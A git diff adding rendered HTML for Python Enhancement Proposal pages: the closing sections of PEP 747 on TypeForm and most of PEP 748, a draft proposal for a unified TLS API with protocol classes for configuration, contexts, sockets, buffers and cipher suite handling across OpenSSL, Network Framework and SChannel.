+    assert_type(count, int)
+else:
+    assert_type(count, str)
+
+
+
+
+

Challenges When Accepting All TypeForms

+

A function that takes an arbitrary TypeForm as input must support a +variety of possible type form objects. Such functions are not easy to write.

+
    +
  • New special forms are introduced with each new Python version, and +special handling may be required for each one.
  • +
  • Quoted annotations [5] (like 'list[str]') +must be parsed (to something like list[str]).
  • +
  • Resolving quoted forward references inside type expressions is typically done with eval(), which is difficult to use in a safe way (see the sketch after this list).
  • +
  • Recursive types like IntTree = list[int | 'IntTree'] are difficult +to resolve.
  • +
  • User-defined generic types (like Django’s QuerySet[User]) can introduce +non-standard behaviors that require runtime support.
  • +
+
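As a small illustration of the quoted-annotation challenge above, here is a minimal sketch (the helper name and the namespace handling are invented for illustration; real implementations need far more care):

def resolve_quoted(annotation: str, namespace: dict[str, object]) -> object:
    # Illustrative only: evaluate a quoted annotation such as "list[str]"
    # against a caller-supplied namespace. As noted above, eval() is
    # difficult to use in a safe way.
    return eval(annotation, {"__builtins__": {}}, dict(namespace))

movie_type = resolve_quoted("list[str]", {"list": list, "str": str})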
+
+
+

Reference Implementation

+

Pyright (version 1.1.379) provides a reference implementation for TypeForm.

+

Mypy contributors also plan to implement +support for TypeForm.

+

A reference implementation of the runtime component is provided in the +typing_extensions module.

+
+
+

Rejected Ideas

+
+

Alternative names

+

Alternate names were considered for TypeForm. TypeObject and TypeType were deemed too generic. TypeExpression and TypeExpr were also considered but rejected as confusing, because these objects are not themselves “expressions” but rather the result of evaluating a type expression.

+
+
+

Widen type[C] to support all type expressions

+

type was designed to describe class objects, subclasses of the +type class. A value with the type type is assumed to be instantiable +through a constructor call. Widening the meaning of type to represent +arbitrary type form objects would present backward compatibility problems +and would eliminate a way to describe the set of values limited to subclasses +of type.
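To illustrate the distinction with a minimal sketch (not taken from the PEP itself): a value typed as type[T] may be called as a constructor, an assumption that does not hold for arbitrary type form objects such as int | None.

def make_default[T](cls: type[T]) -> T:
    # Safe: every value of type `type[T]` is a class object, so it is callable.
    return cls()

make_default(int)          # OK: returns 0
# make_default(int | None)   # rejected by a type checker: not a class object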

+
+
+

Accept arbitrary annotation expressions

+

Certain special forms act as type qualifiers and can be used in +some but not all annotation contexts:

+

For example, the type qualifier Final can be used as a variable type but not as a parameter type or a return type:

+
some_const: Final[str] = ...  # OK
+
+def foo(not_reassignable: Final[object]): ...  # Error: Final not allowed here
+
+def nonsense() -> Final[object]: ...  # Error: Final not allowed here
+
+
+

With the exception of Annotated, type qualifiers are not allowed in type +expressions. TypeForm is limited to type expressions because its +assignability rules are based on the assignability rules for types. It is +nonsensical to ask whether Final[int] is assignable to int because the +former is not a valid type expression.

+

Functions that wish to operate on objects that are evaluated from annotation +expressions can continue to accept such inputs as object parameters.
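For example (an illustrative sketch, not part of the proposal), such a function can accept object and unwrap known type qualifiers itself:

import typing

def strip_qualifiers(annx: object) -> object:
    # Unwrap Final[...] or ClassVar[...] if present; otherwise return the
    # input unchanged. `annx` is deliberately typed as plain `object`.
    if typing.get_origin(annx) in (typing.Final, typing.ClassVar):
        return typing.get_args(annx)[0]
    return annx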

+
+
+

Pattern matching on type forms

+

It was asserted that some functions may wish to pattern match on the +interior of type expressions in their signatures.

+

One use case is to allow a function to explicitly enumerate all the +specific kinds of type expressions it supports as input. +Consider the following possible pattern matching syntax:

+
@overload
+def checkcast(typx: TypeForm[AT=Annotated[T, *A]], value: str) -> T: ...
+@overload
+def checkcast(typx: TypeForm[UT=Union[*Ts]], value: str) -> Union[*Ts]: ...
+@overload
+def checkcast(typx: type[C], value: str) -> C: ...
+# ... (more)
+
+
+

All functions observed in the wild that conceptually accept type form +objects generally try to support all kinds of type expressions, so it +doesn’t seem valuable to enumerate a particular subset.

+

Additionally, the above syntax isn’t precise enough to fully describe the +input constraints for a typical function in the wild. For example, many +functions do not support type expressions with quoted subexpressions +like list['Movie'].

+

A second use case for pattern matching is to explicitly match an Annotated +form to extract the interior type argument and strip away any metadata:

+
def checkcast(
+    typx: TypeForm[T] | TypeForm[AT=Annotated[T, *A]],
+    value: object
+) -> T:
+
+
+

However, Annotated[T, metadata] is already treated as equivalent to T by static type checkers. There is no additional value in being explicit about this behavior. The example above could more simply be written as the equivalent:

+
def checkcast(typx: TypeForm[T], value: object) -> T:
+
+
+
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0747.rst

+

Last modified: 2024-09-29 12:39:10 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0748/index.html b/pep-0748/index.html new file mode 100644 index 00000000000..23db35030c2 --- /dev/null +++ b/pep-0748/index.html @@ -0,0 +1,1648 @@ + PEP 748 – A Unified TLS API for Python | peps.python.org
+
+


+ + +
+
+
+

PEP 748 – A Unified TLS API for Python

+
+
Author:
+
Joop van de Pol <joop.vandepol at trailofbits.com>, +William Woodruff <william at yossarian.net>
+
Sponsor:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
27-Jun-2024
+
Python-Version:
+
3.14
+
Post-History:
+
17-Apr-2024
+
Replaces:
+
543
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP defines a standard TLS interface in the form of a collection of +protocol classes. This interface will allow Python implementations and +third-party libraries to provide bindings to TLS libraries other than OpenSSL.

+

These bindings can be used by tools that expect the interface provided by the +Python standard library, with the goal of reducing the dependence of the Python +ecosystem on OpenSSL.

+
+
+

Rationale

+

It has become increasingly clear that robust and user-friendly TLS support is an +extremely important part of the ecosystem of any popular programming language. +For most of its lifetime, this role in the Python ecosystem has primarily been +served by the ssl module, which provides a Python API to the OpenSSL +library.

+

Because the ssl module is distributed with the Python standard library, +it has become the overwhelmingly most popular method for handling TLS in Python. +A majority of Python libraries, both in the standard library and +on the Python Package Index, rely on the ssl module for their TLS +connectivity.

+

Unfortunately, the preeminence of the ssl module has tied the entire Python ecosystem tightly to OpenSSL. This has forced Python users to use OpenSSL even in situations where it may provide a worse user experience than alternative TLS implementations, which imposes a cognitive burden and makes it hard to provide “platform-native” experiences.

+
+

Problems

+

The fact that the ssl module is built into the standard library has meant +that all standard-library Python networking libraries are entirely reliant on +the OpenSSL that the Python implementation has been linked against. This leads +to the following issues:

+
    +
  • It is difficult to take advantage of new, higher-security TLS without +recompiling Python to get a new OpenSSL. While there are third-party bindings +to OpenSSL (e.g. pyOpenSSL), these +need to be shimmed into a format that the standard library understands, +forcing projects that want to use them to maintain substantial compatibility +layers.
  • +
  • Windows distributions of Python need to be shipped with a copy of +OpenSSL. This puts the CPython development team in the position of being +OpenSSL redistributors, potentially needing to ship security updates to the +Windows Python distributions when OpenSSL vulnerabilities are released.
  • +
  • macOS distributions of Python need either to be shipped with a copy +of OpenSSL or linked against the system OpenSSL library. Apple has formally +deprecated linking against the system OpenSSL library, and even if they had +not, that library version has been unsupported by upstream for nearly one year +as of the time of writing. The CPython development team has started shipping +newer OpenSSLs with the Python available from python.org, but this has the +same problem as with Windows.
  • +
  • Users may wish to integrate with TLS libraries other than OpenSSL for other +reasons, such as maintenance burden versus a system-provided implementation, +or because OpenSSL is simply too large and unwieldy for their platform (e.g. +for embedded Python). Those users are left with the requirement to use +third-party networking libraries that can interact with their preferred TLS +library or to shim their preferred library into the OpenSSL-specific +ssl module API.
  • +
+

Additionally, the ssl module as implemented today limits the ability of +CPython itself to add support for alternative TLS implementations, or remove +OpenSSL support entirely, should either of these become necessary or useful. The +ssl module exposes too many OpenSSL-specific function calls and features +to easily map to an alternative TLS implementation.

+
+
+
+

Proposal

+

This PEP proposes to introduce a few new Protocol Classes in Python 3.14 to +provide TLS functionality that is not so strongly tied to OpenSSL. It also +proposes to update standard library modules to use only the interface exposed by +these protocol classes wherever possible. There are three goals here:

+
  1. To provide a common API surface for both core and third-party developers to target their TLS implementations to. This allows TLS developers to provide interfaces that can be used by most Python code, and allows network developers to have an interface that they can target that will work with a wide range of TLS implementations.
  2. To provide an API through which few or no OpenSSL-specific concepts leak. The ssl module today has a number of warts caused by leaking OpenSSL concepts through to the API: the new protocol classes would remove those specific concepts.
  3. To provide a path for the core development team to make OpenSSL one of many possible TLS implementations, rather than requiring that it be present on a system in order for Python to have TLS support.
+

The proposed interface is laid out below.

+
+

Interfaces

+

There are several interfaces that require standardization. Those interfaces are:

+
  1. Configuring TLS, currently implemented by the SSLContext class in the ssl module.
  2. Providing an in-memory buffer for doing in-memory encryption or decryption with no actual I/O (necessary for asynchronous I/O models), currently implemented by the SSLObject class in the ssl module.
  3. Wrapping a socket object, currently implemented by the SSLSocket class in the ssl module.
  4. Applying TLS configuration to the wrapping objects in (2) and (3). Currently this is also implemented by the SSLContext class in the ssl module.
  5. Specifying TLS cipher suites. There is currently no code for doing this in the standard library: instead, the standard library uses OpenSSL cipher suite strings.
  6. Specifying application-layer protocols that can be negotiated during the TLS handshake.
  7. Specifying TLS versions.
  8. Reporting errors to the caller, currently implemented by the SSLError class in the ssl module.
  9. Specifying certificates to load, either as client or server certificates.
  10. Specifying which trust database should be used to validate certificates presented by a remote peer.
  11. Finding a way to get hold of these interfaces at run time.
+

For the sake of simplicity, this PEP proposes to remove interfaces (3) and (4), +and replace them by a simpler interface that returns a socket which ensures that +all communication through the socket is protected by TLS. In other words, this +interface treats concepts such as socket initialization, the TLS handshake, +Server Name Indication (SNI), etc., as an atomic part of creating a client or +server connection. However, in-memory buffers are still supported, as they are +useful for asynchronous communication.

+

Obviously, (5) doesn’t require a protocol class: instead, it requires a richer +API for configuring supported cipher suites that can be easily updated with +supported cipher suites for different implementations.

+

(9) is a thorny problem, because in an ideal world the private keys associated +with these certificates would never end up in-memory in the Python process +(that is, the TLS library would collaborate with a Hardware Security Module +(HSM) to provide the private key in such a way that it cannot be extracted +from process memory). Thus, we need to provide an extensible model of +providing certificates that allows concrete implementations the ability to +provide this higher level of security, while also allowing a lower bar for +those implementations that cannot. This lower bar would be the same as the +status quo: that is, the certificate may be loaded from an in-memory buffer, +from a file on disk, or additionally referenced by some arbitrary ID +corresponding to a system certificate store.

+

(10) also represents an issue because different TLS implementations vary wildly +in how they allow users to select trust stores. Some implementations have +specific trust store formats that only they can use (such as the OpenSSL CA +directory format that is created by c_rehash), and others may not allow you +to specify a trust store that does not include their default trust store. +On the other hand, most implementations will support some form of loading custom +DER- or PEM-encoded certificates.

+

For this reason, we need to provide a model that assumes very little about the +form that trust stores take, while maintaining type-compatibility with other +implementations. The sections “Certificate”, “Private Keys”, and “Trust Store” +below go into more detail about how this is achieved.

+

Finally, this API will split the responsibilities currently assumed by the +SSLContext object: specifically, the responsibility for holding +and managing configuration and the responsibility for using that configuration +to build buffers or sockets.

+

This is necessary primarily for supporting functionality like Server Name +Indication (SNI). In OpenSSL (and thus in the ssl module), the server has +the ability to modify the TLS configuration in response to the client telling +the server what hostname it is trying to reach. This is mostly used to change +the certificate chain so as to present the correct TLS certificate chain for the +given hostname. The specific mechanism by which this is done is by returning a +new SSLContext object with the appropriate configuration as part +of a user-provided SNI callback function.

+

This is not a model that maps well to other TLS implementations, and puts a +burden on users to write callback functions. Instead, we propose that the +concrete implementations handle SNI transparently for every user after receiving +the relevant certificates.

+

For this reason, we split the responsibility of SSLContext into +two separate objects, which are each split into server and client versions. The +TLSServerConfiguration and TLSClientConfiguration objects act as +containers for a TLS configuration: the ClientContext and ServerContext objects +are instantiated with a TLSClientConfiguration and +TLSServerConfiguration object, respectively, and are used to create buffers +or sockets. All four objects would be immutable.

+
+

Note

+

The following API declarations uniformly use type hints to aid reading.

+
+
+

Configuration

+

The TLSServerConfiguration and TLSClientConfiguration concrete classes +define objects that can hold and manage TLS configuration. The goals of these +classes are as follows:

+
  1. To provide a method of specifying TLS configuration that avoids the risk of errors in typing (this excludes the use of a simple dictionary).
  2. To provide an object that can be safely compared to other configuration objects to detect changes in TLS configuration, for use with the SNI callback.
+

These classes are not protocol classes, primarily because they are not expected to +have implementation-specific behavior. The responsibility for transforming a +TLSServerConfiguration or TLSClientConfiguration object into a useful +set of configurations for a given TLS implementation belongs to the Context +objects discussed below.

+

These classes have one other notable property: they are immutable. This is a +desirable trait for a few reasons. The most important one is that immutability +by default is a good engineering practice. As a side benefit, it allows these +objects to be used as dictionary keys, which is potentially useful for specific +TLS implementations and their SNI configuration. On top of this, it frees +implementations from needing to worry about their configuration objects being +changed under their feet, which allows them to avoid needing to carefully +synchronize changes between their concrete data structures and the configuration +object.

+

These objects are extendable: that is, future releases of Python may add +configuration fields to these objects as they become useful. For +backwards-compatibility purposes, new fields are only appended to these objects. +Existing fields will never be removed, renamed, or reordered. They are split +between client and server to minimize API confusion.

+

The TLSClientConfiguration class would be defined by the following code:

+
class TLSClientConfiguration:
+    __slots__ = (
+        "_certificate_chain",
+        "_ciphers",
+        "_inner_protocols",
+        "_lowest_supported_version",
+        "_highest_supported_version",
+        "_trust_store",
+    )
+
+    def __init__(
+        self,
+        certificate_chain: SigningChain | None = None,
+        ciphers: Sequence[CipherSuite | int] | None = None,
+        inner_protocols: Sequence[NextProtocol | bytes] | None = None,
+        lowest_supported_version: TLSVersion | None = None,
+        highest_supported_version: TLSVersion | None = None,
+        trust_store: TrustStore | None = None,
+    ) -> None:
+        if inner_protocols is None:
+            inner_protocols = []
+
+        self._certificate_chain = certificate_chain
+        self._ciphers = ciphers
+        self._inner_protocols = inner_protocols
+        self._lowest_supported_version = lowest_supported_version
+        self._highest_supported_version = highest_supported_version
+        self._trust_store = trust_store
+
+    @property
+    def certificate_chain(self) -> SigningChain | None:
+        return self._certificate_chain
+
+    @property
+    def ciphers(self) -> Sequence[CipherSuite | int] | None:
+        return self._ciphers
+
+    @property
+    def inner_protocols(self) -> Sequence[NextProtocol | bytes]:
+        return self._inner_protocols
+
+    @property
+    def lowest_supported_version(self) -> TLSVersion | None:
+        return self._lowest_supported_version
+
+    @property
+    def highest_supported_version(self) -> TLSVersion | None:
+        return self._highest_supported_version
+
+    @property
+    def trust_store(self) -> TrustStore | None:
+        return self._trust_store
+
+
+

The TLSServerConfiguration object is similar to the client one, except that +it takes a Sequence[SigningChain] as the certificate_chain parameter.
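As a sketch of intended use (the field values are illustrative, and the CipherSuite, NextProtocol, TLSVersion, and TrustStore types are defined later in this PEP):

client_config = TLSClientConfiguration(
    ciphers=[CipherSuite.TLS_AES_256_GCM_SHA384],
    inner_protocols=[NextProtocol.H2],
    lowest_supported_version=TLSVersion.TLSv1_2,
    trust_store=TrustStore(),  # no arguments: the default system trust store
)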

+
+
+

Context

+

We define two Context protocol classes. These protocol classes define objects +that allow configuration of TLS to be applied to specific connections. They can +be thought of as factories for TLSSocket and TLSBuffer objects.

+

Unlike the current ssl module, we provide two context classes instead of one. Specifically, we provide the ClientContext and ServerContext classes. This simplifies the APIs (for example, there is no sense in a server providing the server_hostname parameter to wrap_socket(), yet because the ssl module has only one context class, that parameter is always available), and ensures that implementations know as early as possible which side of a TLS connection they will serve. Additionally, it allows implementations to opt out of one or the other side of the connection.

+

As much as possible implementers should aim to make these classes immutable: +that is, they should prefer not to allow users to mutate their internal state +directly, instead preferring to create new contexts from new TLSConfiguration +objects. Obviously, the protocol classes cannot enforce this constraint, and so +they do not attempt to.

+

The ClientContext protocol class has the following class definition:

+
class ClientContext(Protocol):
+    @abstractmethod
+    def __init__(self, configuration: TLSClientConfiguration) -> None:
+        """Create a new client context object from a given TLS client configuration."""
+        ...
+
+    @property
+    @abstractmethod
+    def configuration(self) -> TLSClientConfiguration:
+        """Returns the TLS client configuration that was used to create the client context."""
+        ...
+
+    @abstractmethod
+    def connect(self, address: tuple[str | None, int]) -> TLSSocket:
+        """Creates a TLSSocket that behaves like a socket.socket, and
+        contains information about the TLS exchange
+        (cipher, negotiated_protocol, negotiated_tls_version, etc.).
+        """
+        ...
+
+    @abstractmethod
+    def create_buffer(self, server_hostname: str) -> TLSBuffer:
+        """Creates a TLSBuffer that acts as an in-memory channel,
+        and contains information about the TLS exchange
+        (cipher, negotiated_protocol, negotiated_tls_version, etc.)."""
+        ...
+
+
+

The ServerContext is similar, taking a TLSServerConfiguration instead.
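A hypothetical concrete implementation might then be used as follows (OpenSSLClientContext is an invented name for illustration only):

config = TLSClientConfiguration(trust_store=TrustStore())
ctx = OpenSSLClientContext(config)         # hypothetical implementation class
sock = ctx.connect(("example.com", 443))   # handshake is performed here
print(sock.negotiated_tls_version)         # e.g. TLSVersion.TLSv1_3
sock.close(force=False)                    # graceful close_notify exchange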

+
+
+

Socket

+

The context can be used to create sockets, which have to follow the +specification of the TLSSocket protocol class. Specifically, implementations +need to implement the following:

+
    +
  • recv and send
  • +
  • listen and accept
  • +
  • close
  • +
  • getsockname
  • +
  • getpeername
  • +
+

They also need to implement some interfaces that give information about the TLS +connection, such as:

+
    +
  • The underlying context object that was used to create this socket
  • +
  • The negotiated cipher
  • +
  • The negotiated “next” protocol
  • +
  • The negotiated TLS version
  • +
+

The following code describes these functions in more detail:

+
class TLSSocket(Protocol):
+    """This class implements a socket.socket-like object that creates an OS
+    socket, wraps it in an SSL context, and provides read and write methods
+    over that channel."""
+
+    @abstractmethod
+    def __init__(self, *args: object, **kwargs: object) -> None:
+        """TLSSockets should not be constructed by the user.
+        The implementation should implement a method to construct a TLSSocket
+        object and call it in ClientContext.connect() and
+        ServerContext.connect()."""
+        ...
+
+    @abstractmethod
+    def recv(self, bufsize: int) -> bytes:
+        """Receive data from the socket. The return value is a bytes object
+        representing the data received. Should not work before the handshake
+        is completed."""
+        ...
+
+    @abstractmethod
+    def send(self, bytes: bytes) -> int:
+        """Send data to the socket. The socket must be connected to a remote socket."""
+        ...
+
+    @abstractmethod
+    def close(self, force: bool = False) -> None:
+        """Shuts down the connection and mark the socket closed.
+        If force is True, this method should send the close_notify alert and shut down
+        the socket without waiting for the other side.
+        If force is False, this method should send the close_notify alert and raise
+        the WantReadError exception until a corresponding close_notify alert has been
+        received from the other side.
+        In either case, this method should return WantWriteError if sending the
+        close_notify alert currently fails."""
+        ...
+
+    @abstractmethod
+    def listen(self, backlog: int) -> None:
+        """Enable a server to accept connections. If backlog is specified, it
+        specifies the number of unaccepted connections that the system will allow
+        before refusing new connections."""
+        ...
+
+    @abstractmethod
+    def accept(self) -> tuple[TLSSocket, tuple[str | None, int]]:
+        """Accept a connection. The socket must be bound to an address and listening
+        for connections. The return value is a pair (conn, address) where conn is a
+        new TLSSocket object usable to send and receive data on the connection, and
+        address is the address bound to the socket on the other end of the connection."""
+        ...
+
+    @abstractmethod
+    def getsockname(self) -> tuple[str | None, int]:
+        """Return the local address to which the socket is connected."""
+        ...
+
+    @abstractmethod
+    def getpeercert(self) -> bytes | None:
+        """
+        Return the raw DER bytes of the certificate provided by the peer
+        during the handshake, if applicable.
+        """
+        ...
+
+    @abstractmethod
+    def getpeername(self) -> tuple[str | None, int]:
+        """Return the remote address to which the socket is connected."""
+        ...
+
+    @property
+    @abstractmethod
+    def context(self) -> ClientContext | ServerContext:
+        """The ``Context`` object this socket is tied to."""
+        ...
+
+    @abstractmethod
+    def cipher(self) -> CipherSuite | int | None:
+        """
+        Returns the CipherSuite entry for the cipher that has been negotiated on the connection.
+
+        If no connection has been negotiated, returns ``None``. If the cipher negotiated is not
+        defined in CipherSuite, returns the 16-bit integer representing that cipher directly.
+        """
+        ...
+
+    @abstractmethod
+    def negotiated_protocol(self) -> NextProtocol | bytes | None:
+        """
+        Returns the protocol that was selected during the TLS handshake.
+
+        This selection may have been made using ALPN or some future
+        negotiation mechanism.
+
+        If the negotiated protocol is one of the protocols defined in the
+        ``NextProtocol`` enum, the value from that enum will be returned.
+        Otherwise, the raw bytestring of the negotiated protocol will be
+        returned.
+
+        If no inner protocols were configured, if the other
+        party does not support protocol negotiation, if this socket does
+        not support any of the peer's proposed protocols, or if the
+        handshake has not happened yet, ``None`` is returned.
+        """
+        ...
+
+    @property
+    @abstractmethod
+    def negotiated_tls_version(self) -> TLSVersion | None:
+        """The version of TLS that has been negotiated on this connection."""
+        ...
+
+
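A server-side sketch, assuming a hypothetical implementation whose ServerContext has produced a bound, listening-capable TLSSocket (the listener variable stands in for that result):

listener.listen(5)               # allow up to 5 unaccepted connections
conn, addr = listener.accept()   # a new TLSSocket plus the peer address
data = conn.recv(4096)           # plaintext after TLS decryption
conn.send(data)                  # echo the bytes back, re-encrypted
conn.close(force=False)          # graceful close_notify exchange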
+
+
+

Buffer

+

The context can also be used to create buffers, which have to follow the +specification of the TLSBuffer protocol class. Specifically, implementations +need to implement the following:

+
    +
  • read and write
  • +
  • do_handshake
  • +
  • shutdown
  • +
  • process_incoming and process_outgoing
  • +
  • incoming_bytes_buffered and outgoing_bytes_buffered
  • +
  • getpeercert
  • +
+

Similarly to the socket case, they also need to implement some interfaces that +give information about the TLS connection, such as:

+
    +
  • The underlying context object that was used to create this buffer
  • +
  • The negotiated cipher
  • +
  • The negotiated “next” protocol
  • +
  • The negotiated TLS version
  • +
+

The following code describes these functions in more detail:

+
class TLSBuffer(Protocol):
+    """This class implements an in memory-channel that creates two buffers,
+    wraps them in an SSL context, and provides read and write methods over
+    that channel."""
+
+    @abstractmethod
+    def read(self, amt: int, buffer: Buffer | None = None) -> bytes | int:
+        """
+        Read up to ``amt`` bytes of data from the input buffer and return
+        the result as a ``bytes`` instance. If an optional buffer is
+        provided, the result is written into the buffer and the number of
+        bytes is returned instead.
+
+        Once EOF is reached, all further calls to this method return the
+        empty byte string ``b''``.
+
+        May read "short": that is, fewer bytes may be returned than were
+        requested.
+
+        Raise ``WantReadError`` or ``WantWriteError`` if there is
+        insufficient data in either the input or output buffer and the
+        operation would have caused data to be written or read.
+
+        May raise ``RaggedEOF`` if the connection has been closed without a
+        graceful TLS shutdown. Whether this is an exception that should be
+        ignored or not is up to the specific application.
+
+        As at any time a re-negotiation is possible, a call to ``read()``
+        can also cause write operations.
+        """
+        ...
+
+    @abstractmethod
+    def write(self, buf: Buffer) -> int:
+        """
+        Write ``buf`` in encrypted form to the output buffer and return the
+        number of bytes written. The ``buf`` argument must be an object
+        supporting the buffer interface.
+
+        Raise ``WantReadError`` or ``WantWriteError`` if there is
+        insufficient data in either the input or output buffer and the
+        operation would have caused data to be written or read. In either
+        case, users should endeavour to resolve that situation and then
+        re-call this method. When re-calling this method users *should*
+        re-use the exact same ``buf`` object, as some implementations require that
+        the exact same buffer be used.
+
+        This operation may write "short": that is, fewer bytes may be
+        written than were in the buffer.
+
+        As at any time a re-negotiation is possible, a call to ``write()``
+        can also cause read operations.
+        """
+        ...
+
+    @abstractmethod
+    def do_handshake(self) -> None:
+        """
+        Performs the TLS handshake. Also performs certificate validation
+        and hostname verification.
+        """
+        ...
+
+    @abstractmethod
+    def cipher(self) -> CipherSuite | int | None:
+        """
+        Returns the CipherSuite entry for the cipher that has been
+        negotiated on the connection. If no connection has been negotiated,
+        returns ``None``. If the cipher negotiated is not defined in
+        CipherSuite, returns the 16-bit integer representing that cipher
+        directly.
+        """
+        ...
+
+    @abstractmethod
+    def negotiated_protocol(self) -> NextProtocol | bytes | None:
+        """
+        Returns the protocol that was selected during the TLS handshake.
+        This selection may have been made using ALPN, NPN, or some future
+        negotiation mechanism.
+
+        If the negotiated protocol is one of the protocols defined in the
+        ``NextProtocol`` enum, the value from that enum will be returned.
+        Otherwise, the raw bytestring of the negotiated protocol will be
+        returned.
+
+        If no inner protocols were configured, if the other
+        party does not support protocol negotiation, if this socket does
+        not support any of the peer's proposed protocols, or if the
+        handshake has not happened yet, ``None`` is returned.
+        """
+        ...
+
+    @property
+    @abstractmethod
+    def context(self) -> ClientContext | ServerContext:
+        """
+        The ``Context`` object this buffer is tied to.
+        """
+        ...
+
+    @property
+    @abstractmethod
+    def negotiated_tls_version(self) -> TLSVersion | None:
+        """
+        The version of TLS that has been negotiated on this connection.
+        """
+        ...
+
+    @abstractmethod
+    def shutdown(self) -> None:
+        """
+        Performs a clean TLS shut down. This should generally be used
+        whenever possible to signal to the remote peer that the content is
+        finished.
+        """
+        ...
+
+    @abstractmethod
+    def process_incoming(self, data_from_network: bytes) -> None:
+        """
+        Receives some TLS data from the network and stores it in an
+        internal buffer.
+
+        If the internal buffer is overfull, this method will raise
+        ``WantReadError`` and store no data. At this point, the user must
+        call ``read`` to remove some data from the internal buffer
+        before repeating this call.
+        """
+        ...
+
+    @abstractmethod
+    def incoming_bytes_buffered(self) -> int:
+        """
+        Returns how many bytes are in the incoming buffer waiting to be processed.
+        """
+        ...
+
+    @abstractmethod
+    def process_outgoing(self, amount_bytes_for_network: int) -> bytes:
+        """
+        Returns the next ``amount_bytes_for_network`` bytes of data that
+        should be written to the network from the outgoing data buffer,
+        removing them from the internal buffer.
+        """
+        ...
+
+    @abstractmethod
+    def outgoing_bytes_buffered(self) -> int:
+        """
+        Returns how many bytes are in the outgoing buffer waiting to be sent.
+        """
+        ...
+
+    @abstractmethod
+    def getpeercert(self) -> bytes | None:
+        """
+        Return the raw DER bytes of the certificate provided by the peer
+        during the handshake, if applicable.
+        """
+        ...
+
+
+
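To make the intended data flow concrete, here is a sketch of a blocking handshake pump built on a TLSBuffer and an ordinary connected socket (WantReadError and WantWriteError are defined in the “Errors” section below; error handling is deliberately minimal):

import socket

def pump_handshake(buf: TLSBuffer, raw_sock: socket.socket) -> None:
    # Shuttle TLS records between the in-memory buffer and the network
    # until the handshake completes.
    while True:
        try:
            buf.do_handshake()
            return
        except WantWriteError:
            # Drain the outgoing buffer onto the wire.
            raw_sock.sendall(buf.process_outgoing(buf.outgoing_bytes_buffered()))
        except WantReadError:
            # Flush anything pending, then feed in more network data.
            pending = buf.process_outgoing(buf.outgoing_bytes_buffered())
            if pending:
                raw_sock.sendall(pending)
            buf.process_incoming(raw_sock.recv(8192))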
+
+

Cipher Suites

+

Supporting cipher suites in a truly library-agnostic fashion is a remarkably +difficult undertaking. Different TLS implementations often have radically +different APIs for specifying cipher suites, but more problematically these APIs +frequently differ in capability as well as in style.

+

Below are examples of different cipher suite selection APIs. These examples are not intended to obligate implementations to support each API, only to illuminate the constraints imposed by each.

+
+
OpenSSL
+

OpenSSL uses a well-known cipher string format. This format has been adopted as +a configuration language by most products that use OpenSSL, including Python. +This format is relatively easy to read, but has a number of downsides: it is a +string, which makes it easy to provide bad inputs; it lacks much +detailed validation, meaning that it is possible to configure OpenSSL in a way +that doesn’t allow it to negotiate any cipher at all; and it allows specifying +cipher suites in a number of different ways that make it tricky to parse. The +biggest problem with this format is that there is no formal specification for +it, meaning that the only way to parse a given string the way OpenSSL would is +to get OpenSSL to parse it.

+

OpenSSL’s cipher strings can look like this:

+
"ECDH+AESGCM:ECDH+CHACHA20:DH+AESGCM:DH+CHACHA20:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:RSA+AESGCM:RSA+AES:!aNULL:!eNULL:!MD5"
+
+
+

This string demonstrates some of the complexity of the OpenSSL format. For +example, it is possible for one entry to specify multiple cipher suites: the +entry ECDH+AESGCM means “all ciphers suites that include both elliptic-curve +Diffie-Hellman key exchange and AES in Galois Counter Mode”. More explicitly, +that will expand to four cipher suites:

+
"ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256"
+
+
+

That makes parsing a complete OpenSSL cipher string extremely tricky. Add to this the fact that there are other meta-characters, such as “!” (exclude all cipher suites that match this criterion, even if they would otherwise be included: “!MD5” means that no cipher suites using the MD5 hash algorithm should be included), “-” (exclude matching ciphers if they were already included, but allow them to be re-added later if they get included again), and “+” (include the matching ciphers, but place them at the end of the list), and you get an extremely complex format to parse. On top of this complexity it should be noted that the actual result depends on the OpenSSL version, as an OpenSSL cipher string is valid so long as it contains at least one cipher that OpenSSL recognizes.

+

OpenSSL also uses different names for its ciphers than the names used in the +relevant specifications. See the manual page for ciphers(1) for more +details.

+

The actual API inside OpenSSL for the cipher string is simple:

+
char *cipher_list = <some cipher list>;
+int rc = SSL_CTX_set_cipher_list(context, cipher_list);
+
+
+

This means that any format that is used by this module must be able to be +converted to an OpenSSL cipher string for use with OpenSSL.
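A sketch of the kind of conversion an OpenSSL-backed implementation would therefore need (the mapping shown is a small illustrative subset, not a complete table):

IANA_TO_OPENSSL = {
    "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384": "ECDHE-ECDSA-AES256-GCM-SHA384",
    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256": "ECDHE-RSA-AES128-GCM-SHA256",
}

def to_openssl_cipher_string(iana_names: list[str]) -> str:
    # Render IANA cipher suite names as a colon-separated OpenSSL cipher
    # string suitable for SSL_CTX_set_cipher_list().
    return ":".join(IANA_TO_OPENSSL[name] for name in iana_names)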

+
+
+
Network Framework
+

Network Framework is the macOS (10.15+) system TLS library. This library is +substantially more restricted than OpenSSL in many ways, as it has a much more +restricted class of users. One of these substantial restrictions is in +controlling supported cipher suites.

+

Ciphers in Network Framework are represented by an Objective-C uint16_t enum. This enum has one entry per cipher suite, with no aggregate entries, meaning that it is not possible to reproduce the meaning of an OpenSSL cipher string like “ECDH+AESGCM” without hand-coding which categories each enum member falls into.

+

However, the names of most of the enum members are in line with the formal names +of the cipher suites: that is, the cipher suite that OpenSSL calls +“ECDHE-ECDSA-AES256-GCM-SHA384” is called +“tls_ciphersuite_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384” in Network Framework.

+

The API for configuring cipher suites inside Network Framework is simple:

+
void sec_protocol_options_append_tls_ciphersuite(sec_protocol_options_t options, tls_ciphersuite_t ciphersuite);
+
+
+
+
+
SChannel
+

SChannel is the Windows system TLS library.

+

SChannel has extremely restrictive support for controlling available TLS cipher +suites, and additionally adopts a third method of expressing what TLS cipher +suites are supported.

+

